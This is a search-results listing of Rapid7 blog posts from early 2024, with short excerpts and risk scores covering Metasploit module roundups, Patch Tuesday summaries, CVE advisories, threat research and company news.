Lucene search
K
Rapid7blogRecent

1723 matches found

Rapid7 Blog
Rapid7 Blog
added 2024/03/20 10:0 p.m.38 views

The Updated APT Playbook: Tales from the Kimsuky threat actor group

Co-authors are Christiaan Beek and Raj Samani Within Rapid7 Labs we continually track and monitor threat groups. This is one of our key areas of focus as we work to ensure that our ability to protect customers remains constant. As part of this process, we routinely identify evolving tactics from...

7.8AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/03/18 2:30 p.m.32 views

Rapid7 offers continued vulnerability coverage in the face of NVD delays

Recently, the US National Institute of Standards and Technology NIST announced on the National Vulnerability Database NVD site that there would be delays in adding information on newly published CVEs. NVD enriches CVEs with basic details about a vulnerability like the vulnerability’s CVSS score,...

6.8CVSS8.8AI score0.02043EPSS
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/03/15 6:20 p.m.59 views

Metasploit Wrap-Up 03/15/2024

New module content 3 GitLab Password Reset Account Takeover Authors: asterion04 and h00die Type: Auxiliary Pull request: 18716 contributed by h00die Path: admin/http/gitlabpasswordresetaccounttakeover AttackerKB reference: CVE-2023-7028 Description: This adds an exploit module that leverages an...

7.5CVSS8.7AI score0.99938EPSS
Exploits53
Rapid7 Blog
Rapid7 Blog
added 2024/03/14 3:24 p.m.20 views

Rapid7’s Ciara Cullinan Recognized as Community Trailblazer in Belfast Awards Program

At the 2024 Women Who Code She Rocks Awards, Rapid7 Software Engineer II Ciara Cullinan was recognized with their ‘Community Trailblazer’ award. According to Women Who Code, “This award celebrates the efforts of someone who brings people together and creates genuine connections in our tech...

7.1AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/03/12 7:47 p.m.118 views

Patch Tuesday - March 2024

Microsoft is addressing 60 vulnerabilities this March 2024 Patch Tuesday. Microsoft indicated that they aren’t aware of prior public disclosure or exploitation in the wild for any of the vulnerabilities patched today, which means no new additions to CISA KEV at time of writing. Microsoft is...

7.5CVSS9.6AI score0.30504EPSS
Exploits3
Rapid7 Blog
Rapid7 Blog
added 2024/03/08 5:0 p.m.90 views

Metasploit Wrap-Up 03/08/2024

New module content 2 GitLab Tags RSS feed email disclosure Authors: erruquill and n00bhaxor Type: Auxiliary Pull request: 18821 contributed by n00bhaxor Path: gather/gitlabtagsrssfeedemaildisclosure AttackerKB reference: CVE-2023-5612 Description: This adds an auxiliary module that leverages an...

7.5CVSS6AI score0.99753EPSS
Exploits27
Rapid7 Blog
Rapid7 Blog
added 2024/03/07 6:4 p.m.31 views

Securing the Next Level: Automated Cloud Defense in Game Development with InsightCloudSec

Imagine the following scenario: You're about to enjoy a strategic duel on chess.com or dive into an intense battle in Fortnite, but as you log in, you find your hard-earned achievements, ranks, and reputation have vanished into thin air. This is not just a hypothetical scenario but a real...

7.2AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/03/07 6:4 p.m.5 views

Securing the Next Level: Automated Cloud Defense in Game Development with InsightCloudSec

Imagine the following scenario: You're about to enjoy a strategic duel on chess.com or dive into an intense battle in Fortnite, but as you log in, you find your hard-earned achievements, ranks, and reputation have vanished into thin air. This is not just a hypothetical scenario but a real...

7.2AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/03/05 1:45 p.m.19 views

7 Rapid Questions with #77 Ray Bourque

We couldn’t pass up the opportunity to bring Boston Bruins legend Ray Bourque into the herd as we continue to expand our Bruins jersey sponsorship. Ray is an absolute hero to Bruins fans everywhere. He has cemented his status in the annals of Boston sports history through 21 seasons in the black...

6.9AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/03/04 9:34 p.m.12 views

Lessons from video game companies: automation unleashes robust monitoring & observability

Video game organizations need robust monitoring and observability solutions to stay one step ahead of cyber adversaries. Chances are, so do we all. In this blog post, we’ll delve into how monitoring and observability capabilities enable video game organizations to bolster their cybersecurity...

7.2AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/03/04 7:17 p.m.5 views

CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Multiple Authentication Bypass Vulnerabilities (FIXED)

Overview In February 2024, Rapid7’s vulnerability research team identified two new vulnerabilities affecting JetBrains TeamCity CI/CD server: CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue CWE-288 and has a CVSS...

9.8CVSS10AI score0.99991EPSS
Exploits25
Rapid7 Blog
Rapid7 Blog
added 2024/03/04 7:17 p.m.109 views

CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Multiple Authentication Bypass Vulnerabilities (FIXED)

Overview In February 2024, Rapid7’s vulnerability research team identified two new vulnerabilities affecting JetBrains TeamCity CI/CD server: CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue CWE-288 and has a CVSS...

7.5CVSS10AI score0.99991EPSS
Exploits25
Rapid7 Blog
Rapid7 Blog
added 2024/03/01 8:0 p.m.45 views

Metasploit Weekly Wrap-Up 03/01/2024

Connect the dots from authentication bypass to remote code execution This week, our very own sfewer-r7 added a new exploit module that leverages an authentication bypass vulnerability in ConnectWise ScreenConnect to achieve remote code execution. This vulnerability, CVE-2024-1709, affects all...

7.5CVSS9AI score0.99959EPSS
Exploits8
Rapid7 Blog
Rapid7 Blog
added 2024/02/29 5:32 p.m.63 views

How To Hunt For UEFI Malware Using Velociraptor

UEFI threats have historically been limited in number and mostly implemented by nation state actors as stealthy persistence. However, the recent proliferation of Black Lotus on the dark web, Trickbot enumeration module late 2022, and Glupteba November 2023 indicates that this historical trend may...

4.9CVSS6.9AI score0.06567EPSS
Exploits1
Rapid7 Blog
Rapid7 Blog
added 2024/02/23 5:50 p.m.61 views

Metasploit Weekly Wrap-Up 02/23/2024

LDAP Capture module Metasploit now has an LDAP capture module thanks to the work of JustAnda7. This work was completed as part of the Google Summer of Code program. When the module runs it will by default require privileges to listen on port 389. The module implements a default implementation for...

7.5CVSS9.8AI score0.99999EPSS
Exploits40
Rapid7 Blog
Rapid7 Blog
added 2024/02/20 8:3 p.m.57 views

High-Risk Vulnerabilities in ConnectWise ScreenConnect

On February 19, 2024 ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect 23.9.7 and earlier. Neither vulnerability had a CVE assigned at time of disclosure, but as of February 21, CVEs have been assigned to both issues...

7.5CVSS9.7AI score0.99959EPSS
Exploits9
Rapid7 Blog
Rapid7 Blog
added 2024/02/20 5:3 p.m.53 views

Explanation of New Authenticated Scanning PCI DSS Requirement 11.3.1.2 in PCI DSS V4.0 and how InsightVM can help meet the Requirement

By: Dominick Vitolo, VP of Security Services, MegaplanIT As a Certified Qualified Security Assessor QSA company and a trusted Rapid7 partner, MegaplanIT is committed to guiding organizations through the complexities of compliance and security standards. PCI DSS version 4.0 is a significant update...

7AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/02/16 8:34 p.m.28 views

Metasploit Weekly Wrap-Up 02/16/2024

New Fetch Payload It has been almost a year since Metasploit released the new fetch payloads and since then, 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded...

7.3AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/02/15 7:38 p.m.53 views

RCE to Sliver: IR Tales from the Field

Rapid7 Incident Response consultants Noah Hemker, Tyler Starks, and malware analyst Tom Elkins contributed analysis and insight to this blog. Rapid7 Incident Response was engaged to investigate an incident involving unauthorized access to two publicly-facing Confluence servers that were the sourc...

7.5CVSS8.6AI score0.99984EPSS
Exploits31
Rapid7 Blog
Rapid7 Blog
added 2024/02/15 7:38 p.m.8 views

RCE to Sliver: IR Tales from the Field

Rapid7 Incident Response consultants Noah Hemker, Tyler Starks, and malware analyst Tom Elkins contributed analysis and insight to this blog. Rapid7 Incident Response was engaged to investigate an incident involving unauthorized access to two publicly-facing Confluence servers that were the sourc...

10CVSS10AI score0.99984EPSS
Exploits31
Rapid7 Blog
Rapid7 Blog
added 2024/02/14 2:0 p.m.9 views

Paving a Path to Systems Administration: Naeem Jones’ Journey with Rapid7

Prior to becoming a Systems Administrator at Rapid7, Naeem Jones entered his career in cybersecurity through the Hack. Diversity program. Hack.Diversity is a program that connects talented Black and Latin/x students and early-career professionals with organizations that are looking to build...

7.2AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/02/13 9:26 p.m.126 views

Patch Tuesday - February 2024

Microsoft is addressing 73 vulnerabilities this February 2024 Patch Tuesday, including two actually, three! zero-day/exploited-in-the-wild vulnerabilities, both of which are already included on the CISA KEV list. Today also brings patches for two critical remote code execution RCE vulnerabilities...

7.5CVSS10AI score0.99995EPSS
Exploits40
Rapid7 Blog
Rapid7 Blog
added 2024/02/13 4:0 p.m.5 views

CVE-2023-47218: QNAP QTS and QuTS Hero Unauthenticated Command Injection (FIXED)

Rapid7 has identified an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and QuTS hero. QTS is a core part of the firmware for numerous QNAP entry- and mid-level Network Attached Storage NAS devices, and QuTS hero is a core part of the firmware for numero...

8.3CVSS6.9AI score0.89157EPSS
Exploits4
Rapid7 Blog
Rapid7 Blog
added 2024/02/13 4:0 p.m.76 views

CVE-2023-47218: QNAP QTS and QuTS Hero Unauthenticated Command Injection (FIXED)

Rapid7 has identified an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and QuTS hero. QTS is a core part of the firmware for numerous QNAP entry- and mid-level Network Attached Storage NAS devices, and QuTS hero is a core part of the firmware for numero...

4.3CVSS8.5AI score0.89157EPSS
Exploits4
Rapid7 Blog
Rapid7 Blog
added 2024/02/12 1:23 p.m.140 views

Critical Fortinet FortiOS CVE-2024-21762 Exploited

On February 8, 2024 Fortinet disclosed multiple critical vulnerabilities affecting FortiOS, the operating system that runs on Fortigate SSL VPNs. The critical vulnerabilities include CVE-2024-21762, an out-of-bounds write vulnerability in SSLVPNd that could allow remote unauthenticated attackers ...

7.5CVSS8.6AI score0.99474EPSS
Exploits29
Rapid7 Blog
Rapid7 Blog
added 2024/02/09 7:35 p.m.50 views

Metasploit Weekly Wrap-Up 02/09/2024

Go go gadget Fortra GoAnywhere MFT Module This Metasploit release contains a module for one of 2024's hottest vulnerabilities to date: CVE-2024-0204. The path traversal vulnerability in Fortra GoAnywhere MFT allows for unauthenticated attackers to access the InitialAccountSetup.xhtml endpoint whi...

7.5CVSS8.6AI score0.95086EPSS
Exploits13
Rapid7 Blog
Rapid7 Blog
added 2024/02/07 3:59 p.m.19 views

5 Insights from the Latest Cybersecurity Trends Research

Rapid7 is committed to promoting research that identifies the latest cybersecurity trends so that organizations can leverage these insights and create programs that make sense for the modern SOC. To that end, we’ve singled out five quick insights security professionals and stakeholders should...

7.3AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/02/06 6:0 p.m.21 views

Celebrating Excellence: Alex Page Recognized As a CRN 2024 Channel Chief

Congratulations to Rapid7’s Vice President of Global Channel Sales, Alex Page, who is named among the newly-announced CRN 2024 Channel Chiefs! Alex, who also received this prestigious accolade in 2023, has been recognized for his outstanding contributions and expertise in driving strategic...

7.1AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/02/06 2:0 p.m.14 views

Four Key Benefits of Rapid7’s New Managed Digital Risk Protection Service

Cybercrime has boomed to the third largest economy in the world behind the US and China Cybernews, with much of the most nefarious behavior on the dark web. Monitoring it effectively can be the key to identifying the earliest signals of an attack – and the difference between a minor event and a...

7AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/02/05 7:8 p.m.400 views

Exploring the (Not So) Secret Code of Black Hunt Ransomware

It seems like every week, the cybersecurity landscape sees the emergence of yet another ransomware variant, with Black Hunt being one of the latest additions. Initially reported by cybersecurity researchers in 2022, this new threat has quickly made its presence known. In a recent incident, Black...

8.2AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/02/02 8:14 p.m.50 views

Metasploit Weekly Wrap-Up 02/02/2024

Shared RubySMB Service Improvements This week’s updates include improvements to Metasploit Framework’s SMB server implementation: the SMB server can now be reused across various SMB modules, which are now able to register their own unique shares and files. SMB modules can also now be executed...

7.5CVSS9.6AI score0.97106EPSS
Exploits22
Rapid7 Blog
Rapid7 Blog
added 2024/02/02 4:8 p.m.20 views

Rapid7 in Prague: Pete Rubio Shares Insights and Excitement for the New Office

As we continue to grow our customer base here at Rapid7, we’re growing our offices as well – this time with a new location in the Czech Republic. With a successful history of building innovation hubs from Boston to Belfast, our teams can’t wait to bring new talent from Prague into the business...

6.9AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/31 5:5 p.m.21 views

InsightAppSec: Improving Scan Speed and Performance

When scanning a web application in InsightAppSec, you might see it take several hours, if not several days, to run. This can be due to the size of your web app, but plenty of settings in your scan configuration can be modified to help scans complete faster. The first setting is Info - Enable...

7AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/26 9:12 p.m.72 views

Metasploit Weekly Wrap-Up 01/26/24

Direct Syscalls Support for Windows Meterpreter Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any...

7.5CVSS10AI score0.99999EPSS
Exploits102
Rapid7 Blog
Rapid7 Blog
added 2024/01/25 2:58 p.m.10 views

Building the Best SOC Takes Strategic Thinking

So your security team is ready to scale up its security operations center, or SOC, to better meet the security needs of your organization. That’s great news. But there are some very important strategic questions that need to be answered if you want to build the most effective SOC you can and avoi...

7.1AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/23 6:42 p.m.85 views

CVE-2024-0204: Critical Authentication Bypass in Fortra GoAnywhere MFT

On January 22, 2024, Fortra published a security advisory on CVE-2024-0204, a critical authentication bypass affecting its GoAnywhere MFT secure managed file transfer product prior to version 7.4.1. The vulnerability is remotely exploitable and allows an unauthorized user to create an admin user...

7.5CVSS7.6AI score0.99999EPSS
Exploits20
Rapid7 Blog
Rapid7 Blog
added 2024/01/19 9:36 p.m.49 views

Metasploit Weekly Wrap-Up 01/19/24

Unicode your way to a php payload and three modules to add to your playbook for Ansible Our own jheysel-r7 added an exploit leveraging the fascinating tool of php filter chaining to prepend a payload using encoding conversion characters and h00die et. al. have come through and added 3 new Ansible...

7.5CVSS7AI score0.97846EPSS
Exploits14
Rapid7 Blog
Rapid7 Blog
added 2024/01/19 3:40 p.m.83 views

Critical CVEs in Outdated Versions of Atlassian Confluence and VMware vCenter Server

Rapid7 is highlighting two critical vulnerabilities in outdated versions of widely deployed software this week. Atlassian disclosed CVE-2023-22527, a template injection vulnerability in Confluence Server with a maxed-out CVSS score of 10, while VMware pushed a fresh update to its October 2023...

10CVSS10AI score0.99999EPSS
Exploits121
Rapid7 Blog
Rapid7 Blog
added 2024/01/18 6:0 p.m.15 views

Privacy, Security, and Connected Devices: Key Takeaways From CES 2024

The topic of data privacy has become so relevant in our age of smart technology. With everything becoming connected, including our homes, workplaces, cities, and even our cars, those who develop this technology are obligated to identify consumers' expectations for privacy and then find the best...

7.4AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/18 2:0 p.m.10 views

How CISOs’ Roles – and Security Operations – Will Change in 2024

It’s fair to say that 2023 was a turning point for the cybersecurity industry, and no one felt it more than the CISO. From the onslaught of ransomware and zero-day attacks, to the SEC’s new reporting rules, and added to technological innovation and sprawl, CISOs have never been under more pressur...

7.5AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/17 8:32 p.m.35 views

Whispers of Atlantida: Safeguarding Your Digital Treasure

Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users to download a malicious file from a compromised website, and uses several evasion techniques such as reflective loading and injection before the stealer is loaded. Atlantida steals a wide range of login information ...

7.3AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/16 4:0 p.m.9 views

Application Security Posture Management

Accelerating the Remediation of Vulnerabilities From Code To Cloud Written by Eric Sheridan, Chief Innovation Officer, Tromzo In this guest blog post by Eric Sheridan, Chief Innovation Officer at valued Rapid7 partner Tromzo, you’ll learn how Rapid7 customers can utilize ASPM solutions to...

6.7AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/12 9:25 p.m.44 views

Metasploit Weekly Wrap-Up 01/12/24

New module content 1 Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor Author: Pasquale 'sid' Fiorillo Type: Post Pull request: 18604 contributed by siddolo Path: windows/gather/credentials/winboxsettings Description: This pull request introduces a new post module to extract th...

7.5CVSS7.3AI score0.99753EPSS
Exploits15
Rapid7 Blog
Rapid7 Blog
added 2024/01/12 2:0 p.m.15 views

2023 Ransomware Stats: A Look Back To Plan Ahead

Last year was not a year for the faint of heart. Organizations of every size found themselves faced with ransomware attacks at varying levels of sophistication, yet every one of them was damaging. And as we step into 2024, the first victims of ransomware attacks are already being reported. What c...

6.9AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/11 3:0 p.m.13 views

4 Questions for CISOs to Reduce Threat Exposure Risk

In an ongoing effort to help security organizations gain greater visibility into threat exposure risk, we have determined four key questions every CISO should be considering based on our understanding of the recommendations of a new report from Gartner®. The report, 2024 Strategic Roadmap for...

7.3AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/11 1:0 p.m.84 views

Zero-Day Exploitation of Ivanti Connect Secure and Policy Secure Gateways

Information on these vulnerabilities has evolved considerably since this blog was originally published on January 11, 2024. Customers should refer to Ivanti's two advisories, KB article, and recovery guidance for the latest updates. On Wednesday, January 10, 2024, Ivanti disclosed two zero-day...

6.5CVSS10AI score0.99999EPSS
Exploits26
Rapid7 Blog
Rapid7 Blog
added 2024/01/09 9:23 p.m.187 views

Patch Tuesday - January 2024

Microsoft is addressing 49 vulnerabilities this January 2024 Patch Tuesday, including a single critical remote code execution vulnerability. Four browser vulnerabilities were published separately this month, and are not included in the total. No zero-day vulnerabilities are published or patched...

7.5CVSS9.8AI score0.99618EPSS
Exploits20
Rapid7 Blog
Rapid7 Blog
added 2024/01/05 6:48 p.m.38 views

Metasploit Weekly Wrap-Up 1/05/2024

New module content 2 Splunk raw Server Info Disclosure Authors: KOF2002, h00die, and n00bhaxor Type: Auxiliary Pull request: 18635 contributed by n00bhaxor Path: gather/splunkrawserverinfo Description: This PR adds a module for an authenticated Splunk information disclosure vulnerability. This...

7.5CVSS9.3AI score0.92918EPSS
Exploits10
Rapid7 Blog
Rapid7 Blog
added 2024/01/05 5:24 p.m.25 views

Rapid7’s Data-Centric Approach to AI in Belfast

Authored by Stuart Millar and Ryan Wilson. Rapid7 has expanded significantly in Belfast since establishing a presence back in 2014, resulting in the company's largest R&D hub outside the US with over 350 people spread across eight floors in our Chichester Street office. There is a wide range of...

7AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2024/01/04 4:0 p.m.18 views

Rapid7 Recognized by Newsweek as one of ‘America’s Greatest Workplaces for Diversity for 2024’.

On December 13th, Newsweek Magazine published their list of ‘America’s Greatest Workplaces for Diversity for 2024’. Like many companies today, Rapid7 recognizes the positive impact diversity plays in driving organizational success, attracting and retaining exceptional talent, and creating positiv...

6.9AI score
Exploits0
Total number of security vulnerabilities1723